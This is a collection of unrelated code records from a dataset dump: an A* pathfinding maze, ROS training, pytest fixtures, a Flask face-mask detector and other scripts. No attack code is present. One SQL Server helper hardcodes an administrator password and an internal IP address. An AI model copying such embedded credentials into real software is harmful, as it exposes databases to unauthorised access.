Create new node\n new_node = Node(current_node, node_position)\n\n # Append\n children.append(new_node)\n\n # Loop through children\n for child in children:\n\n # Child is on the closed list\n for closed_child in closed_list:\n if child == closed_child:\n continue\n\n # Create the f, g, and h values\n child.g = current_node.g + 1\n child.h = ((child.position[0] - end_node.position[0]) **\n 2) + ((child.position[1] - end_node.position[1]) ** 2)\n child.f = child.g + child.h\n\n # Child is already in the open list\n for open_node in open_list:\n if child == open_node and child.g > open_node.g:\n continue\n\n # Add the child to the open list\n open_list.append(child)\n\n\nif __name__ == \"__main__\":\n maze = [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]\n pygame.init()\n SCREEN = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n s_e_position = []\n while True:\n SCREEN.fill(WHITE)\n drawGrid(maze)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n elif event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 3:\n x, y = pygame.mouse.get_pos()\n for t in range(0, 800, 80):\n for u in range(0, 800, 80):\n if x > t and x <= t+80 and y > u and y <= u+80:\n maze[u//80][t//80] = 1\n\n if event.button == 1:\n x, y = pygame.mouse.get_pos()\n for t in range(0, 800, 80):\n for u in range(0, 800, 80):\n if x > t and x <= t+80 and y > u and y <= u+80:\n maze[u//80][t//80] = 2\n s_e_position.append([u//80, t//80])\n\n if len(s_e_position) == 2:\n start = tuple(s_e_position[0])\n end = tuple(s_e_position[1])\n\n maze[start[0]][start[1]] = 0\n maze[end[0]][end[1]] = 0\n path = astar(maze, start, end)\n drawAnswerGrid(maze, path)\n\n pygame.display.update()\n\"\"\"\n for i in range(10):\n for j in range(10):\n if maze[i][j] == 2:\n if count == 1:\n start = (i, j)\n print(1)\n if count == 2:\n end = (i, j)\n maze[start[0]][start[1]] = 0\n maze[end[0]][end[1]] = 0\n print(maze)\n path = astar(maze, start, end)\n drawAnswerGrid(maze, path)\n print(path)\n break\n\"\"\"\n","sub_path":"scripts/maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":6536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"275008350","text":"#!/usr/bin/env python\n\nimport os\nimport rospy\nimport yaml\nfrom omron_cad_matching.util import *\nfrom omron_cad_matching.train_client import *\n\nclass TrainMultiNode(TrainClient):\n def __init__(self):\n super(TrainMultiNode, self).__init__()\n\n # file settings\n cad_dir = rospy.get_param(\"~cad_dir\")\n conf_dir = rospy.get_param(\"~conf_dir\")\n parts_list = rospy.get_param(\"~parts_list\")\n setting_filename = rospy.get_param(\"~camera_setting_filename\")\n model_dir = rospy.get_param(\"~model_dir\")\n model_name = rospy.get_param(\"~model_name\")\n\n # object search param\n min_dist = rospy.get_param(\"~train_setting/min_dist\")\n max_dist = rospy.get_param(\"~train_setting/max_dist\")\n thread_num = rospy.get_param(\"~train_setting/thread_num\")\n\n # create client of omron cad matching training service server\n self.init_model()\n\n # camera setting\n camera_setting = read_camera_setting_yaml(setting_filename)\n\n # for each parts\n id_map = dict()\n object_id = 0\n for parts in parts_list:\n # read object config\n conf_filename = os.path.join(conf_dir, parts + \".yaml\")\n rospy.loginfo(\"read object config. file = %s\", conf_filename)\n obj_conf = read_object_config_yaml(conf_filename)\n search_setting = get_search_setting(obj_conf, min_dist, max_dist, thread_num)\n\n # train\n cad_filename = os.path.join(cad_dir, parts + \".stl\")\n rospy.loginfo(\"train. cad file = %s\", cad_filename)\n res = self.train_model(cad_filename, camera_setting, search_setting)\n if res.model_id >= 0:\n id_map[obj_conf.object_id] = res.model_id\n\n # save trained model that include template of all parts into a file\n data_filename = os.path.join(model_dir, model_name + \".dat\")\n text_filename = os.path.join(model_dir, model_name + \"_train.txt\")\n rospy.loginfo(\"save model. file = %s\", data_filename)\n self.save_model(data_filename, text_filename)\n\n # save map from object_id to model_id to yaml file \n id_filename = os.path.join(model_dir, model_name + \".yaml\")\n data = dict(id_map = id_map)\n with open(id_filename, 'w') as outfile:\n yaml.dump(data, outfile, default_flow_style=False)\n rospy.loginfo(\"id_map from object_id to model_id = \" + str(id_map))\n\nif __name__ == \"__main__\":\n rospy.init_node('train_multi', anonymous=True, log_level=rospy.INFO)\n node = TrainMultiNode()\n","sub_path":"catkin_ws/src/omron_cad_matching/scripts/train_multi.py","file_name":"train_multi.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"217920505","text":"#!/bin/env python3\n# -*- coding: utf-8 -*-\n# TOMUSS: The Online Multi User Simple Spreadsheet\n# Copyright (C) 2008-2011 Thierry EXCOFFIER, Universite Claude Bernard\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n#\n# Contact: Thierry.EXCOFFIER@bat710.univ-lyon1.fr\n\nfrom ..column import ColumnAttr\nfrom .. import configuration\nimport time\n\nclass ColumnVisibilityDate(ColumnAttr):\n name = 'visibility_date'\n update_table_headers = 1\n def check(self, date):\n if date == '':\n return\n mktime = time.mktime(time.strptime(date, '%Y%m%d'))\n if mktime > time.time() + 86400*configuration.max_visibility_date:\n return '''_(\"ALERT_date_in_future_1\")+\"%d\"+\n_(\"ALERT_date_in_future_2\")\n''' % int((time.mktime(time.strptime(date, '%Y%m%d')) - time.time())/86400)\n if mktime < time.time() - 86400:\n return '_(\"ALERT_date_in_past\")'\n formatter = '''\nfunction(column, value)\n{\n if ( value === '' ) return '' ;\n return column.visibility_date.substr(6,2) + '/' +\n\t column.visibility_date.substr(4,2) + '/' +\n\t column.visibility_date.substr(0,4) ;\n}'''\n check_and_set = 'set_visibility_date'\n css = \"\"\"\n#t_column_visibility_date.empty {\n background-image: url('visible.png');\n}\n\n#menutop DIV.tabs #t_column_visibility_date { width: 73% }\n\n\"\"\"\n","sub_path":"ATTRIBUTES/columnvisibilitydate.py","file_name":"columnvisibilitydate.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"345183837","text":"#!/usr/bin/env python3\n\n\"\"\" \nCreated on:\t July, 2020\n@uthor: \t adejonghm\n----------\n\nScript to Manage the JSON file.\n\"\"\"\n\nimport os\nimport json\nimport argparse\nimport libs.jilib as jm\n\n\nif __name__ == \"__main__\":\n\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-f\", \"--file\", required=True, help=\"path to the input JSON file\")\n args = vars(ap.parse_args())\n\n if args['file'].endswith('.json') and os.path.exists(args['file']):\n input_path = args['file']\n else:\n print('ERROR! JSON file not found.')\n os.sys.exit(1)\n\n #### READ JSON FILE ####\n with open(input_path, encoding='utf-8') as file:\n inFile = json.load(file)\n\n outFile = jm.add_item_in_node(inFile, 1, \"backgrdImage\", \"background.jpg\")\n\n #### WRITE NEW JSON FILE ####\n with open('metadata.json', 'w', encoding='utf-8') as file:\n json.dump(outFile, file, indent=2)\n\n print('DONE!')\n","sub_path":"SignalProcessing/json_manager.py","file_name":"json_manager.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"314178648","text":"from wtforms.validators import ValidationError\n\nfrom app import db_session\n\nclass Unique(object):\n def __init__(self, model, field, message=None):\n self.model = model\n self.field = field\n if not message:\n message = u'%s exists already' % (field)\n self.message = message\n\n def __call__(self, form, field):\n check = db_session.query(self.model).filter(self.field == field.data).first()\n if 'id' in form:\n id = form.id.data\n else:\n id = None\n if check and (id is None or id != check.id):\n raise ValidationError(self.message)\n","sub_path":"app/common/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"584312800","text":"\"\"\"\n Definition of xNVMe Python Distribution Package\n\"\"\"\nimport codecs\nimport glob\nimport os\nfrom setuptools import setup\n\ndef read(*parts):\n \"\"\"Read parts to use a e.g. long_description\"\"\"\n\n here = os.path.abspath(os.path.dirname(__file__))\n\n # intentionally *not* adding an encoding option to open, See:\n # https://github.com/pypa/virtualenv/issues/201#issuecomment-3145690\n with codecs.open(os.path.join(here, *parts), 'r') as pfp:\n return pfp.read()\n\nsetup(\n name=\"pyxnvme\",\n version=\"0.0.12\",\n description=\"xNVMe: cross-platform libraries and tools for NVMe devices\",\n long_description=read('README.rst'),\n author=\"Simon A. F. Lund\",\n author_email=\"simon.lund@samsung.com\",\n# url=\"https://github.com/xnvme/xnvme\",\n license=\"Apache License 2.0\",\n install_requires=[],\n zip_safe=False,\n packages=[\"xnvme\"],\n# package_dir={\"\": \"modules\"},\n data_files=[\n (\"bin\", glob.glob(\"bin/*\")),\n ],\n options={'bdist_wheel':{'universal':True}},\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Environment :: Console\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: System Administrators\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Programming Language :: Python\",\n \"Topic :: Utilities\",\n \"Topic :: Software Development\",\n \"Topic :: Software Development :: Testing\"\n ],\n)\n","sub_path":"pyxnvme/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"220381703","text":"\"\"\"\nPytest unit test configuration for oodi\n\"\"\"\nfrom pathlib import Path\nfrom shutil import copyfile, copytree, rmtree\nfrom typing import Iterator\n\nimport pytest\n\nfrom oodi.client import Oodi\nfrom oodi.codecs.constants import CodecFormat\nfrom oodi.configuration import Configuration\nfrom oodi.library.album import Album\nfrom oodi.library.tree import Library\nfrom oodi.metadata.constants import ALBUMART_SUPPORTED_FILENAMES, BOOKLET_SUPPORTED_FILENAMES\n\nMOCK_MESSAGE = 'Mock message'\n\nMOCK_DATA = Path(__file__).parent.joinpath('mock')\nMOCK_METADATA = MOCK_DATA.joinpath('metadata')\nMOCK_CONFIG_DIRECTORY = MOCK_DATA.joinpath('config/default')\nMOCK_EMPTY_CONFIG_DIRECTORY = MOCK_DATA.joinpath('config/empty')\n\n# Directory with whitenoise samples\nMOCK_WHITENOISE_SAMPLES_PATH = MOCK_DATA.joinpath('samples')\nMOCK_WHITENOISE_SAMPLES_FOLDER_COUNT = 3\nMOCK_METADATA_FILES_COUNT = 8\nMOCK_WHITENOISE_SAMPLES_COUNT = 9\n\n# Mocked album paths that do not exist\nTEST_ALBUM_PATHS = (\n Path('Album/In Library'),\n)\n\n# List of all sample files as standard Path objects from the test data directory\nWHITENOISE_SAMPLE_FILES = [\n item\n for item in list(MOCK_WHITENOISE_SAMPLES_PATH.glob('**/*'))\n if item.is_file()\n]\n\nMOCK_METADATA_FILES = [path for path in MOCK_METADATA.glob('**/*') if path.is_file()]\nMOCK_ALBUMART_FILES = [\n path\n for path in MOCK_METADATA_FILES\n if path.name in ALBUMART_SUPPORTED_FILENAMES\n]\nMOCK_BOOKLET_FILES = [\n path\n for path in MOCK_METADATA_FILES\n if path.name in BOOKLET_SUPPORTED_FILENAMES\n]\n\n\n@pytest.fixture\ndef mock_missing_config_file(monkeypatch, tmpdir) -> Iterator[Path]:\n \"\"\"\n Return a non-existing temporary directory for constant\n oodi.constants.USER_CONFIG_DIRECTORY\n \"\"\"\n missing_config_path = Path(tmpdir.strpath, 'missing-userconfig')\n monkeypatch.setattr(\n 'oodi.constants.USER_CONFIG_DIRECTORY',\n missing_config_path\n )\n yield missing_config_path\n if missing_config_path and missing_config_path.is_dir():\n rmtree(missing_config_path)\n\n\n@pytest.fixture\ndef mock_empty_config_file(monkeypatch) -> Iterator[Path]:\n \"\"\"\n Mock constant oodi.constants.USER_CONFIG_DIRECTORY to return\n mocked directory tests/mock/config/empty with valid but empty\n configuration file\n \"\"\"\n monkeypatch.setattr(\n 'oodi.constants.USER_CONFIG_DIRECTORY',\n MOCK_EMPTY_CONFIG_DIRECTORY,\n )\n yield MOCK_EMPTY_CONFIG_DIRECTORY\n\n\n@pytest.fixture\ndef mock_default_config_file(monkeypatch) -> Iterator[Path]:\n \"\"\"\n Mock constant oodi.constants.USER_CONFIG_DIRECTORY to return\n mocked directory tests/mock/config/default\n \"\"\"\n monkeypatch.setattr(\n 'oodi.constants.USER_CONFIG_DIRECTORY',\n MOCK_CONFIG_DIRECTORY,\n )\n yield MOCK_CONFIG_DIRECTORY\n\n\n@pytest.fixture\ndef missing_tmpdir_directory(tmpdir) -> Iterator[Path]:\n \"\"\"\n Yield missing temporary directory path for unit tests\n \"\"\"\n missing_directory = Path(tmpdir.strpath, 'missing-directory')\n yield missing_directory\n if missing_directory and missing_directory.is_dir():\n rmtree(missing_directory)\n\n\n# pylint: disable=redefined-outer-name,unused-argument\n@pytest.fixture\ndef mock_empty_config(mock_empty_config_file) -> Iterator[Configuration]:\n \"\"\"\n Mock returning Configuration object with mock_empty_config_file fixture\n \"\"\"\n yield Configuration()\n\n\n@pytest.fixture(params=WHITENOISE_SAMPLE_FILES)\ndef mock_sample_file(request) -> Iterator[Path]:\n \"\"\"\n Mock request with full paths to the sample files in test data\n \"\"\"\n yield request.param\n\n\n@pytest.fixture(params=MOCK_METADATA_FILES)\ndef mock_metadata_file(request):\n \"\"\"\n Mock fixture to list all available metadata files in test data\n \"\"\"\n yield request.param\n\n\n@pytest.fixture(params=MOCK_ALBUMART_FILES)\ndef mock_albumart_file(request):\n \"\"\"\n Mock fixture to list all available album art files in test data\n \"\"\"\n yield request.param\n\n\n@pytest.fixture(params=MOCK_BOOKLET_FILES)\ndef mock_booklet_file(request):\n \"\"\"\n Mock fixture to list all available booklet files in test data\n \"\"\"\n yield request.param\n\n\n@pytest.fixture\ndef mock_empty_library(mock_empty_config, tmpdir) -> Iterator[Library]:\n \"\"\"\n Mock returning Library object for tmpdir directory\n \"\"\"\n yield Library(config=mock_empty_config, path=Path(tmpdir.strpath))\n\n\n@pytest.fixture\ndef mock_sample_library(mock_empty_config, tmpdir) -> Iterator[Library]:\n \"\"\"\n Generate a Library object for samples with albumart and bookmark files\n from mock data directory\n \"\"\"\n albumart = MOCK_ALBUMART_FILES[0]\n booklet = MOCK_BOOKLET_FILES[0]\n path = Path(tmpdir.strpath, 'music')\n\n copytree(MOCK_WHITENOISE_SAMPLES_PATH, path)\n copyfile(albumart, path.joinpath(albumart.name))\n copyfile(booklet, path.joinpath(booklet.name))\n for item in path.glob('**/*'):\n if item.is_dir():\n copyfile(albumart, item.joinpath(albumart.name))\n copyfile(booklet, item.joinpath(booklet.name))\n\n yield Library(\n config=mock_empty_config,\n path=path,\n formats=[codec_format.value for codec_format in CodecFormat]\n )\n\n\n@pytest.fixture\ndef oodi_empty_client(mock_empty_config_file) -> Iterator[Oodi]:\n \"\"\"\n Yield Oodi client with mocked empty config\n \"\"\"\n yield Oodi()\n\n\n@pytest.fixture\ndef oodi_default_client(mock_default_config_file) -> Iterator[Oodi]:\n \"\"\"\n Yield Oodi client with mocked default config\n \"\"\"\n yield Oodi()\n\n\n@pytest.fixture(params=TEST_ALBUM_PATHS)\ndef mock_album_relative_path(request) -> Iterator[Path]:\n \"\"\"\n Return iterator for valid album relative paths\n \"\"\"\n yield request.param\n\n\n# pylint: disable=redefined-outer-name\n@pytest.fixture\ndef mock_album(mock_empty_library, mock_album_relative_path) -> Iterator[Album]:\n \"\"\"\n Return mocked Album object\n \"\"\"\n yield Album(mock_empty_library, mock_empty_library.joinpath(mock_album_relative_path))\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":5991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"55817528","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nfrom skimage.segmentation import *\nimport prepData\nfrom classicMethods import nonNNAlgo\nfrom sklearn.decomposition import PCA\nimport pickle\nfrom timeit import default_timer as timer\nimport glob\n#import extract_data\n\nwidth = 520\nheight = 475\nnum_pixel = (width-7)*(height-7)\n\n# extract train and test data directly\n# train_x, train_y, _, _, _, _, _, test_x, test_y, _, _, _ = extract_data.exData(save_idx = False)\n\n# read all data\ntrain_x = []\ntrain_y = []\ntest_x = []\ntest_y = []\nfor k in range (0,4):# read every video\n \n # train data\n for filename in glob.glob('train_data_surgery'+str(k)+'_*.pkl'):\n with open(filename, 'rb') as f:\n train_x_temp, train_y_temp = pickle.load( f )\n# train_x_temp, train_y_temp, _, _, _ = pickle.load( f ) # for _short\n train_x.append(train_x_temp)\n train_y.append(train_y_temp) \n print(train_x_temp.shape,train_y_temp.shape)\n \n # test data\n with open('test_data_surgery'+str(k)+'.pkl', 'rb') as f:\n test_x_temp, test_y_temp, _, _,_ = pickle.load( f )\n test_x.append(test_x_temp)\n test_y.append(test_y_temp)\n \n print('test', test_x_temp.shape, test_x_temp.shape)\n \ntrain_x = np.concatenate(train_x, axis=0) \ntrain_y = np.concatenate(train_y, axis=0)\ntest_x = np.concatenate(test_x, axis=0) \ntest_y = np.concatenate(test_y, axis=0)\n \n# print(train_x.shape,train_y.shape, test_x.shape, test_y.shape)\n \n## pca: only works for _short data\n#pca = PCA(n_components=5)\n#train_x = pca.fit_transform(train_x)\n \nnon_NN_Algo = nonNNAlgo(None, None, None, None, None, None)\nnon_NN_Algo.train_X = train_x\nnon_NN_Algo.train_Y = train_y.ravel()\n\n# train Bayes\nprint('start training Bayes...')\nstart = timer()\n_ = non_NN_Algo.naiveBayesianSeg(train_idx = True, test_idx = False)\nprint('[bayes]', timer() - start)\n\n## test\n#non_NN_Algo.test_X = pca.transform(test_x)\nnon_NN_Algo.test_X = test_x\nnon_NN_Algo.test_Y = test_y.ravel()\ntest_results = non_NN_Algo.naiveBayesianSeg(train_idx = False, test_idx = True, pMetrics=True)\nprint('test bayes: 1)iou:',test_results[1],'2)dice:',test_results[2],'3)time:',test_results[3])","sub_path":"classic_methods/trainbayes.py","file_name":"trainbayes.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"289359633","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 22 19:42:43 2020\n\n@author: franc\n\"\"\"\n\n\nimport pandas as pd\nimport math\nimport numpy as np\n\npath_guardado = \"./data/artwork_data.pickle\"\n\ndf = pd.read_pickle(path_guardado)\n\nseccion_df = df.iloc[49980:50019,:].copy()\n\ndf_agrupar_artista = seccion_df.groupby(\"artist\")\n\nprint(type(df_agrupar_artista))\n\nfor columna, df_agrupado in df_agrupar_artista:\n print(\"Columna\", type(columna))\n print(columna)\n print(\"Df_agrupado\", type(df_agrupado))\n print(df_agrupado)\n \n# hacer calciulos en columnas del df\n\na = seccion_df[\"units\"].value_counts() # 38 (mm) #1 nan\n\n\n#Verificar si la columan esta vacia\nprint(seccion_df[\"units\"].empty)\nprint(a.empty)\n\ndef llenar_valores_vacios(series, tipo):\n lista_valores = series.value_counts()\n if lista_valores.empty == True:\n return series\n else:\n if tipo == \"promedio\":\n suma = 0\n numero_valores = 0\n for valor_serie in series:\n if (isinstance(valor_serie, str)):\n valor = int(valor_serie)\n numero_valores += 1\n suma += valor\n else: \n pass\n promedio = suma/ numero_valores\n series_valores_llenos = series.fillna(promedio)\n return series_valores_llenos\n elif tipo == \"mas_repetido\":\n cuentas_series = series.value_counts() \n mas_repetido = series.value_counts().index[0]\n return series.fillna(mas_repetido)\n \n\ndef transformar_df(df):\n df_artist = df.groupby(\"artist\")\n lista_df= []\n for artista, df in df_artist:\n copia_df = df.copy()\n serie_w = copia_df[\"width\"]\n serie_h = copia_df[\"height\"]\n serie_u = copia_df[\"units\"]\n serie_i = copia_df[\"title\"]\n print(\"Serie i\", serie_i)\n copia_df.loc[:, \"width\"] = llenar_valores_vacios(serie_w, \"promedio\")\n copia_df.loc[:, \"height\"] = llenar_valores_vacios(serie_h, \"promedio\")\n copia_df.loc[:, \"units\"] = llenar_valores_vacios(serie_u, \"mas_repetido\")\n copia_df.loc[:, \"title\"] = llenar_valores_vacios(serie_i, \"mas_repetido\")\n lista_df.append(copia_df)\n df_completo = pd.concat(lista_df)\n return df_completo\n \ndf_lleno = transformar_df(seccion_df)\n","sub_path":"03 - Pandas/h_group.py","file_name":"h_group.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"646172267","text":"import all_servers.getconn\nimport all_servers.getCompanyDBs\nimport sys \nprint(sys.version)\n\nix=0\ntotal=0\n\nclass DBCompany:\n def __init__(self, name, csr):\n self.name = name\n self.csr = csr \n\n def getHeader(self):\n global ix\n ix+=1\n header = '%s/%s %s' % (ix, total, self.name)\n return header #print()\n\n def doSql(self, sql, fetch=True):\n self.csr.execute( 'use [%s]' % self.name )\n self.csr.execute(sql)\n if fetch:\n x = self.csr.fetchall()\n else:\n x=''\n #print(x)\n return x\n\n\n def validDB(self, verbose=True): \n valid_sql = \"\"\"\nselect count(*) from INFORMATION_SCHEMA.TABLES\nwhere table_name = 'uorgs_Users'\n\"\"\"\n self.csr.execute( 'use [%s]' % self.name )\n self.csr.execute(valid_sql)\n r = self.csr.fetchall()\n #print(r)\n r = r[0] # take first row.\n #print(r)\n r = r[0] # take first column.\n #print(r)\n isValid = (r > 0)\n if not isValid and verbose:\n print('invalid db:', self.name)\n\n return isValid\n\n\n\n\n\n\n\n\ndbConn = ''\n\n\ndef getAll_DB_Conns(DV):\n global total, dbConn\n\n masterDB1 = '192.168.15.27' #'AjourSQL'\n #masterDB1 = r'jg-pc\\JG1'\n theDBCfg = { 'server': masterDB1, 'db': 'master', 'user': 'sa', 'pwd': 'morOg234' }\n\n #with all_servers.getconn.getConn(theDBCfg) as conn:\n dbConn = all_servers.getconn.getConn(theDBCfg) \n\n csr = dbConn.cursor()\n companyDBs = all_servers.getCompanyDBs.getCompanyDBList(csr, DV)\n\n #companyObjs = list( map( lambda x: DBCompany(x), companyDBs) )\n companyObjs = [ DBCompany(name, csr) for name in companyDBs ]\n total = len(companyDBs)\n #print(type(companyObjs))\n return companyObjs #companyDBs\n\n# http://www.u.arizona.edu/~erdmann/mse350/topics/list_comprehensions.html\n\n\nalone = (__name__ == \"__main__\") \nif alone:\n all = getAll_DB_Conns()\n print(len(all))\n\n","sub_path":"sqlserver_all2/all_servers/get_all_the_servers.py","file_name":"get_all_the_servers.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"533519183","text":"import asyncio\nimport time\nfrom pathlib import Path\n\nimport aiohttp\n\nfrom Scripts.Downloader.Novel.nparse import WuxiaWorldCo\nimport requests\nimport re\nfrom bs4 import BeautifulSoup\n\nfrom Scripts.Downloader.Novel.services import save_content, save\n\n\nasync def get_content_save_function():\n nparse = WuxiaWorldCo()\n resp = requests.get('https://m.wuxiaworld.co/Lord-of-the-Mysteries/2752246.html')\n print(f'[STATUS CODE] {resp.status_code}'\n f'\\n[CONTENT LENGTH] {resp.headers[\"content-length\"]}')\n\n if resp.ok:\n markup = resp.text\n soup = BeautifulSoup(markup, parser='html.parser', features='lxml')\n content = nparse.parse_content(soup)\n await save_content(content, Path('testfile.chapter'))\n print(f'[CONTENT]\\n{content}')\n\nasync def fetch(session, url):\n stime = time.perf_counter()\n async with session.get(url) as response:\n await response.text()\n return time.perf_counter() - stime\n\nasync def arequest_duration(url):\n async with aiohttp.ClientSession() as session:\n tasks = []\n durations = []\n for i in range(10):\n task = asyncio.create_task(fetch(session, url))\n durations.append(await task)\n # task = asyncio.create_task(fetch(session, url))\n # tasks.append(task)\n # durations = await asyncio.gather(*tasks)\n print(f'[AVERAGE DURATION] {sum(durations) / len(durations)}')\n\ndef request_duration(url):\n durations = []\n for i in range(10):\n start = time.perf_counter()\n content = requests.get(url).text\n duration = time.perf_counter() - start\n durations.append(duration)\n # print(f'[DURATION] {duration:0.2f} s')\n print(f'[AVERAGE DURATION] {sum(durations) / len(durations)}')\n\ndef duration_tests():\n url = 'https://www.google.com/'\n print('[SYNCHRONOUS REQUESTS]')\n request_duration(url)\n\n print('\\n[ASYNCHRONOUS REQUESTS]')\n loop = asyncio.get_event_loop()\n start = time.perf_counter()\n try:\n loop.run_until_complete(arequest_duration(url))\n except Exception as ex:\n print(ex)\n finally:\n print(f'[DURATION] {time.perf_counter() - start:0.2f} s')\n loop.close()\n\nasync def save_data_create_dir_if_not_exists():\n filepath = Path('test_files', 'new.txt')\n await save('', filepath)\n\nif __name__ == '__main__':\n # duration_tests()\n loop = asyncio.get_event_loop()\n loop.run_until_complete(save_data_create_dir_if_not_exists())\n loop.close()\n","sub_path":"Scripts/Downloader/Novel/tests/function_tests.py","file_name":"function_tests.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"641580386","text":"from flask import Flask, render_template, Response\nfrom tensorflow.keras.applications.mobilenet_v2 import preprocess_input\nfrom tensorflow.keras.preprocessing.image import img_to_array\nfrom tensorflow.keras.models import load_model\nfrom imutils.video import VideoStream\nimport numpy as np\nimport imutils\nimport time\nimport cv2\nimport os\n\napp = Flask(__name__,template_folder='Template')\n\ndef detect_and_predict_mask(frame, faceNet, maskNet):\n # grab dimensions of frame then construct a blob from it\n (h, w) = frame.shape[:2]\n blob = cv2.dnn.blobFromImage(frame,1.0, (192,192),\n (104.0,177.0,123.0))\n \n # pass the blob through the network and obtain the face detections\n faceNet.setInput(blob)\n detections = faceNet.forward()\n print(detections.shape)\n \n # init list of faces and corresponding locations, and the list of predictions from our facemask network\n \n faces = []\n locations = []\n predictions = []\n \n # loop over the detections\n for i in range(0, detections.shape[2]):\n # extract the confidence(probability) associated with the detection\n confidence = detections[0,0,i,2]\n \n # filter out weak detections by ensuring the confidence is greater than the minimum confidence\n if confidence > 0.5:\n # compute the (x, y)-coordinates of the bounding box for the object\n box = detections[0,0,i,3:7] * np.array([w,h,w,h])\n (startX, startY, endX, endY) = box.astype('int')\n \n # make sure the bounding boxes fall within the dimensions of the frame\n (startX, startY) = (max(0, startX), max(0, startY))\n (endX, endY) = (min(w-1, endX), min(h-1, endY))\n \n # extract the face Region Of Interest, convert it from BGR to RGB channel ordering, resize it, and preprocess it\n face = frame[startY:endY, startX:endX]\n face = cv2.cvtColor(face, cv2.COLOR_BGR2RGB)\n face = cv2.resize(face, (224,224))\n face = img_to_array(face)\n face = preprocess_input(face)\n \n # add the face and bounding boxes to their respective lists\n faces.append(face)\n locations.append((startX, startY, endX, endY))\n \n # only make the predictions if at least one face was detected\n if len(faces) > 0:\n # for faster inference we'll make batch predictions on all faces at the same time rather than one-by-one predictions in the obove for loop\n faces = np.array(faces)\n predictions = maskNet.predict(faces, batch_size=32)\n \n # return tuple of the face locations and their corresponding locations\n return (locations, predictions)\n\n# load our serialized face detector model from disk\nprototxt_path = r\"../face_detector/deploy.prototxt\"\nweightsPath = r\"../face_detector/res10_300x300_ssd_iter_140000.caffemodel\"\nfaceNet = cv2.dnn.readNet(prototxt_path,weightsPath)\n\n# load face mask detector model from disk\nmaskNet = load_model(\"detect_mask.model\")\n\n# init the video stream\nprint(\"[INFO] Starting video stream...\")\n\n\ndef get_frames():\n vs = VideoStream(0).start()\n # loop over the frames from the video stream\n while True:\n # grab the frame from threaded video stream and resize it to have max width of 400 pixels\n frame = vs.read()\n frame = imutils.resize(frame, width=400)\n\n # detect faces in the frame and determ if they are wearing mask, not wearing, or worn incorrectly\n (locs, preds) = detect_and_predict_mask(frame, faceNet, maskNet)\n\n # loop over detected fadce locations and their corresponding locations\n for (box, pred) in zip(locs, preds):\n # unpack the bounding box and predictions\n (startX, startY, endX, endY) = box\n (mask, withoutMask) = pred\n\n # determine the class label and color we'll use to draw the bounding box and text\n label = \"Mask\" if mask > withoutMask else \"No Mask\"\n color = (0, 255, 0) if label == \"Mask\" else (0, 0, 255)\n\n # incl probability in the label\n label = \"{}: {:.2f}%\".format(label, max(mask, withoutMask) * 100)\n\n # display the label and bounding box rectangle on the output frame\n cv2.putText(frame,label, (startX, startY-10), cv2.FONT_HERSHEY_SIMPLEX,0.45, color, 2)\n cv2.rectangle(frame, (startX, startY), (endX, endY), color, 2)\n\n # show output frame\n cv2.imshow(\"Frame\", frame)\n key = cv2.waitKey(1) & 0xFF\n\n # if 'q' key is pressed, break from the loop\n if key == ord('q'):\n break\n\n # do a bit of cleanup\n cv2.destroyAllWindows()\n vs.stop()\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n@app.route('/video')\ndef video():\n return Response(get_frames(), 